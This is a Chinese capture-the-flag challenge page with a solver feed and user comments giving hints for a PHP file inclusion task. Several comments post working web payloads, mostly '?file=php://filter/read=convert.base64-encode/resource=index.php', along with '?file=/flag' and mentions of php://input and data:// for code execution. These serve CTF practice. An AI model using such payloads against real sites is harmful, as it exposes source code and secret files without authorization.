评分(11)
解题动态
掘金 攻破了该题 1小时前
白科技 攻破了该题 3小时前
xinxin803 攻破了该题 4小时前
旦旦 攻破了该题 1天前
H&M 攻破了该题 1天前
一只十五 攻破了该题 1天前
雨会停 攻破了该题 1天前
2985315046 攻破了该题 1天前
7yangtao 攻破了该题 1天前
lilili% 攻破了该题 1天前
12355 攻破了该题 1天前
aiii 攻破了该题 1天前
hhhhz 攻破了该题 1天前
wufufu 攻破了该题 1天前
问琴 攻破了该题 1天前
穗和 攻破了该题 1天前
无所取也 攻破了该题 2天前
超然 攻破了该题 2天前
xiaoye111 攻破了该题 2天前
评论
SxPeng 2天前
举报
flag{******}
kitniu 1月前
举报
?file=/flag ,查看源代码
mkmkm 1月前
举报
flag{***}
Ywctf 4月前
举报
/?file=php://filter/read=convert.base64-encode/resource=index.php
帅帅123 5月前
举报
发现参数?file= 怀疑是文件读取或者目录穿越 尝试php为协议 命令执行:php://input data://text/plain,<?php ?> 字节流编码读取: php://filter/conver.base64-encode/resource=index.php
奔跑的开开 5月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php
ok了 7月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php 秒了
VVang 8月前
举报
用php://filter包含index.php,然后base64解码得到flag
聪10011 8月前
举报
猜flag位置,file=/flag
8208240204 9月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php 然后发现==表明是base64解码得到flag